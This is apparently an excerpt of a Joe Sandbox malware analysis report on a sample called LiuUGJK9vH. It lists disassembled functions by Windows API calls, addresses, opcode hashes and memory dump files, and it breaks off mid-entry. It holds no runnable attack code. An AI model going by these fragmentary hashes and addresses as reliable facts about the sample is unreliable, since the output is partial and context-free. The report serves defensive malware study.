                      • Instruction Fuzzy Hash: A1419435904114ABE710FF24CC4CFAEBBA4EB09310F144A67E815A73E1C7B8AD65D75A
                      Function 00402344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON
                      Download Yara Rule
                      APIs
                      • GetCursorPos.USER32(?), ref: 00402357
                      • ScreenToClient.USER32(004C57B0,?), ref: 00402374
                      • GetAsyncKeyState.USER32(00000001), ref: 00402399
                      • GetAsyncKeyState.USER32(00000002), ref: 004023A7
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: AsyncState$ClientCursorScreen
                      • String ID:
                      • API String ID: 4210589936-0
                      • Opcode ID: 68046f809d22b14954676cdf12726acdb6c494720a6fd25c838d2cb9e82985d9
                      • Instruction ID: 839f7de4dd1eaa7d0d5dffd0863558e2d4fc2f6d206a63eef28a724dc464cb27
                      • Opcode Fuzzy Hash: 68046f809d22b14954676cdf12726acdb6c494720a6fd25c838d2cb9e82985d9
                      • Instruction Fuzzy Hash: EB416135504115FBCF199FA9C848AEEBB74FB09364F20432BE825A22D0C7789D54DB95
                      Function 004563AA Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON
                      Download Yara Rule
                      APIs
                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 004563E7
                      • TranslateAcceleratorW.USER32(?,?,?), ref: 00456433
                      • TranslateMessage.USER32(?), ref: 0045645C
                      • DispatchMessageW.USER32(?), ref: 00456466
                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00456475
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Message$PeekTranslate$AcceleratorDispatch
                      • String ID:
                      • API String ID: 2108273632-0
                      • Opcode ID: a7c8caa960d18c36081a52289de371ede53fdfa9d0291adbc1963a0764221605
                      • Instruction ID: 5e30e11b4a1e50e6093782a7c3f18569847dc725279de51faeef3c0bd44cbf51
                      • Opcode Fuzzy Hash: a7c8caa960d18c36081a52289de371ede53fdfa9d0291adbc1963a0764221605
                      • Instruction Fuzzy Hash: 0A31A731500646AFDB648F74CC44FAB7BA8AB02306F95017AEC11C3262E729A4CDDB5D
                      Function 00458A1F Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON
                      Download Yara Rule
                      APIs
                      • GetWindowRect.USER32(?,?), ref: 00458A30
                      • PostMessageW.USER32(?,00000201,00000001), ref: 00458ADA
                      • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00458AE2
                      • PostMessageW.USER32(?,00000202,00000000), ref: 00458AF0
                      • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00458AF8
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: MessagePostSleep$RectWindow
                      • String ID:
                      • API String ID: 3382505437-0
                      • Opcode ID: 0ca9fd056ca19cb6c90bb9abdc103f32fbac461099b2f563c45de53987908b56
                      • Instruction ID: 80642b6b9bd3aba6b5d9fb31be4e412888bcfd4668c130c4b2f9d35bc39c9ded
                      • Opcode Fuzzy Hash: 0ca9fd056ca19cb6c90bb9abdc103f32fbac461099b2f563c45de53987908b56
                      • Instruction Fuzzy Hash: 9831DF71500219EBDF14CFA8D94CA9E3BB5EB04316F10862EF924E72D2CBB49D18CB94
                      Function 0045B1EC Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON
                      Download Yara Rule
                      APIs
                      • IsWindowVisible.USER32(?), ref: 0045B204
                      • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0045B221
                      • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0045B259
                      • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0045B27F
                      • _wcsstr.LIBCMT ref: 0045B289
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                      • String ID:
                      • API String ID: 3902887630-0
                      • Opcode ID: f21b8a10daa1041978f1337458d9b000d4fcd72cb6c57214ff7d717bad64366e
                      • Instruction ID: 2c7352b259513f6215f8baf2ea9b1e154aa1926be373c141b5dda8785e83a564
                      • Opcode Fuzzy Hash: f21b8a10daa1041978f1337458d9b000d4fcd72cb6c57214ff7d717bad64366e
                      • Instruction Fuzzy Hash: DF2103312042007BEB155B75AC09A7F7B98DB49711F10417EFC04DA262EF699C4597A8
                      Function 0048B14B Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                      • GetWindowLongW.USER32(?,000000F0), ref: 0048B192
                      • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0048B1B7
                      • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0048B1CF
                      • GetSystemMetrics.USER32(00000004), ref: 0048B1F8
                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00470E90,00000000), ref: 0048B216
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Window$Long$MetricsSystem
                      • String ID:
                      • API String ID: 2294984445-0
                      • Opcode ID: 4e73adee6138af7d1bf797c64f9d3d784d2b70968eee1b9af5d753c6da9745a2
                      • Instruction ID: a9241cd50f58f28df48e309b6b0d701528321bfcfd0e0dab973ca591f656860e
                      • Opcode Fuzzy Hash: 4e73adee6138af7d1bf797c64f9d3d784d2b70968eee1b9af5d753c6da9745a2
                      • Instruction Fuzzy Hash: D6218071910651AFCB10AF389C18A6F3BA4FB15361F144F3ABD32D72E0E73498618B98
                      Function 00459307 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON
                      Download Yara Rule
                      APIs
                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00459320
                        • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                      • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00459352
                      • __itow.LIBCMT ref: 0045936A
                      • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00459392
                      • __itow.LIBCMT ref: 004593A3
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: MessageSend$__itow$_memmove
                      • String ID:
                      • API String ID: 2983881199-0
                      • Opcode ID: 84fe632702548fb1505fa491271f0483b598e009c5f2d7716c087cfb082072c1
                      • Instruction ID: 968ba8743040f36d453ad30986a6980fa4fc6e9bba4f502b0ab074d445a6e810
                      • Opcode Fuzzy Hash: 84fe632702548fb1505fa491271f0483b598e009c5f2d7716c087cfb082072c1
                      • Instruction Fuzzy Hash: 0821F831B00204FBDB10AA618C85EAE3BA8EF4C715F14403AFD04E72C2D6B89D49979A
                      Function 004012F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                      Download Yara Rule
                      APIs
                      • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0040134D
                      • SelectObject.GDI32(?,00000000), ref: 0040135C
                      • BeginPath.GDI32(?), ref: 00401373
                      • SelectObject.GDI32(?,00000000), ref: 0040139C
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: ObjectSelect$BeginCreatePath
                      • String ID:
                      • API String ID: 3225163088-0
                      • Opcode ID: 6eee13c9652aa66c46a5bd740bf4bc56e64492aa972ec1549dd75ab418036029
                      • Instruction ID: 345c33b4cc72e80acb91194012c3a0486190d93d7afc841094e42ad70741f55b
                      • Opcode Fuzzy Hash: 6eee13c9652aa66c46a5bd740bf4bc56e64492aa972ec1549dd75ab418036029
                      • Instruction Fuzzy Hash: 74215130800604DFEB10AF15DC04B6E7BA8FB00351F54463BF810A61F0D778A8A5DFA9
                      Function 00464A93 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON
                      Download Yara Rule
                      APIs
                      • GetCurrentThreadId.KERNEL32 ref: 00464ABA
                      • __beginthreadex.LIBCMT ref: 00464AD8
                      • MessageBoxW.USER32(?,?,?,?), ref: 00464AED
                      • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00464B03
                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00464B0A
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                      • String ID:
                      • API String ID: 3824534824-0
                      • Opcode ID: 6202b558f3b2a9591e93c05a74b6ac6320d8986f7eb6685660a047ad8363ccb0
                      • Instruction ID: dad7fb5640a7fc086676ad258fed45b246edcd9838203791acb142923f9e7505
                      • Opcode Fuzzy Hash: 6202b558f3b2a9591e93c05a74b6ac6320d8986f7eb6685660a047ad8363ccb0
                      • Instruction Fuzzy Hash: AC110876904214BBCB009FA8EC08E9F7FACEB85320F14427AF815D3350E679DD448BA9
                      Function 02F918DF Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • GetLastError.KERNEL32(00000008,?,?,02F915D8,02F93CBB,?,02F91D2A,?,?,00000000), ref: 02F918E4
                      • _free.LIBCMT ref: 02F91919
                      • _free.LIBCMT ref: 02F91940
                      • SetLastError.KERNEL32(00000000,?,02F91D2A,?,?,00000000), ref: 02F9194D
                      • SetLastError.KERNEL32(00000000,?,02F91D2A,?,?,00000000), ref: 02F91956
                      Memory Dump Source
                      • Source File: 00000000.00000002.1481149798.0000000002F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F50000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2f50000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: ErrorLast$_free
                      • String ID:
                      • API String ID: 3170660625-0
                      • Opcode ID: c863b998470ca2ecd3d0b5a3a8b0c92856acd0dc6d04f18acf8cc596131c552b
                      • Instruction ID: 30c223402c5ebb258c70ebc3f7ba0ffca6959356f33039bd5eb532196da5f5dd
                      • Opcode Fuzzy Hash: c863b998470ca2ecd3d0b5a3a8b0c92856acd0dc6d04f18acf8cc596131c552b
                      • Instruction Fuzzy Hash: F0012137A402073FBF1226356C88A2B321E9BC17F87100534FF0EA2251FB7388128820
                      Function 00458202 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON
                      Download Yara Rule
                      APIs
                      • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 0045821E
                      • GetLastError.KERNEL32(?,00457CE2,?,?,?), ref: 00458228
                      • GetProcessHeap.KERNEL32(00000008,?,?,00457CE2,?,?,?), ref: 00458237
                      • HeapAlloc.KERNEL32(00000000,?,00457CE2,?,?,?), ref: 0045823E
                      • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00458255
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                      • String ID:
                      • API String ID: 842720411-0
                      • Opcode ID: cfd5187f71e7f5cd8bdbe136946f039270b76956d2ef1bbe7b4a41513b9fedde
                      • Instruction ID: ea2086197a74160409fd2b37e3cc6aadebf9925ef2750944b4d42ea2a50fea98
                      • Opcode Fuzzy Hash: cfd5187f71e7f5cd8bdbe136946f039270b76956d2ef1bbe7b4a41513b9fedde
                      • Instruction Fuzzy Hash: 5F012471200604AF9B204FA6DC88D6B7FACEF8A755B50097EF809D2220DE318C18CA64
                      Function 0045710A Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON
                      Download Yara Rule
                      APIs
                      • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?,?,?,00457455), ref: 00457127
                      • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?,?), ref: 00457142
                      • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?,?), ref: 00457150
                      • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?), ref: 00457160
                      • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?,?), ref: 0045716C
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: From$Prog$FreeStringTasklstrcmpi
                      • String ID:
                      • API String ID: 3897988419-0
                      • Opcode ID: 053515c948ca66986ad112422e3531eaba7e5432baa58b7069d320ef88250593
                      • Instruction ID: e33d562c89cd7b32e1c2ea0ad0b2255dbd3c00d864d4e8b233389f959c6fe991
                      • Opcode Fuzzy Hash: 053515c948ca66986ad112422e3531eaba7e5432baa58b7069d320ef88250593
                      • Instruction Fuzzy Hash: 9F01DF72600604BBCB105F68EC44BAE7BADEF44792F100079FD04D2321DB35DD088BA4
                      Function 00465244 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON
                      Download Yara Rule
                      APIs
                      • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00465260
                      • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0046526E
                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00465276
                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00465280
                      • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 004652BC
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: PerformanceQuery$CounterSleep$Frequency
                      • String ID:
                      • API String ID: 2833360925-0
                      • Opcode ID: f570a565f6e5a323919ec457eb30d6746b1d20e306601747cbf76f1b2f538e79
                      • Instruction ID: 4ceb344e541e682f07f906f107c4893f4acd0a9012da7968cf5d6b0cf31b4d70
                      • Opcode Fuzzy Hash: f570a565f6e5a323919ec457eb30d6746b1d20e306601747cbf76f1b2f538e79
                      • Instruction Fuzzy Hash: 89015B71D01A19DBCF00DFE4DC585EEBB78FB09711F4004AAE941F2240DB3459548BAA
                      Function 0045810A Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                      Download Yara Rule
                      APIs
                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00458121
                      • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0045812B
                      • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0045813A
                      • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00458141
                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00458157
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: HeapInformationToken$AllocErrorLastProcess
                      • String ID:
                      • API String ID: 44706859-0
                      • Opcode ID: 9a4f6c5eb7810c0e88419f6a8d5d9273e391a222e84c7421f05042c8608bd2e6
                      • Instruction ID: c07733b115f7f4265118d5d6f8c893d5168d9180ec19ac620c451b64c6eb697f
                      • Opcode Fuzzy Hash: 9a4f6c5eb7810c0e88419f6a8d5d9273e391a222e84c7421f05042c8608bd2e6
                      • Instruction Fuzzy Hash: 71F0AF70200704AFEB110FA5EC88E6B3BACEF4A755B10043EF945D2250DF649C09DB64
                      Function 0045C1E3 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON
                      Download Yara Rule
                      APIs
                      • GetDlgItem.USER32(?,000003E9), ref: 0045C1F7
                      • GetWindowTextW.USER32(00000000,?,00000100), ref: 0045C20E
                      • MessageBeep.USER32(00000000), ref: 0045C226
                      • KillTimer.USER32(?,0000040A), ref: 0045C242
                      • EndDialog.USER32(?,00000001), ref: 0045C25C
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: BeepDialogItemKillMessageTextTimerWindow
                      • String ID:
                      • API String ID: 3741023627-0
                      • Opcode ID: 4cc83a5054ee70337c3131b30a14a5b24bd9acd8f200e045765572ac389ab5c6
                      • Instruction ID: 1cbdf9da880a683b58ffeaf16326a4f2222d3a7c74a558aa9ab436c5b6b9af77
                      • Opcode Fuzzy Hash: 4cc83a5054ee70337c3131b30a14a5b24bd9acd8f200e045765572ac389ab5c6
                      • Instruction Fuzzy Hash: DF0167309047049BEB205B54DD8EB9A7778BB00706F000ABEB942A15E1DBF8699DDB59
                      Function 02F93171 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • _free.LIBCMT ref: 02F93189
                        • Part of subcall function 02F92096: HeapFree.KERNEL32(00000000,00000000,?,02F93208,?,00000000,?,00000000,?,02F9322F,?,00000007,?,?,02F92697,?), ref: 02F920AC
                        • Part of subcall function 02F92096: GetLastError.KERNEL32(?,?,02F93208,?,00000000,?,00000000,?,02F9322F,?,00000007,?,?,02F92697,?,?), ref: 02F920BE
                      • _free.LIBCMT ref: 02F9319B
                      • _free.LIBCMT ref: 02F931AD
                      • _free.LIBCMT ref: 02F931BF
                      • _free.LIBCMT ref: 02F931D1
                      Memory Dump Source
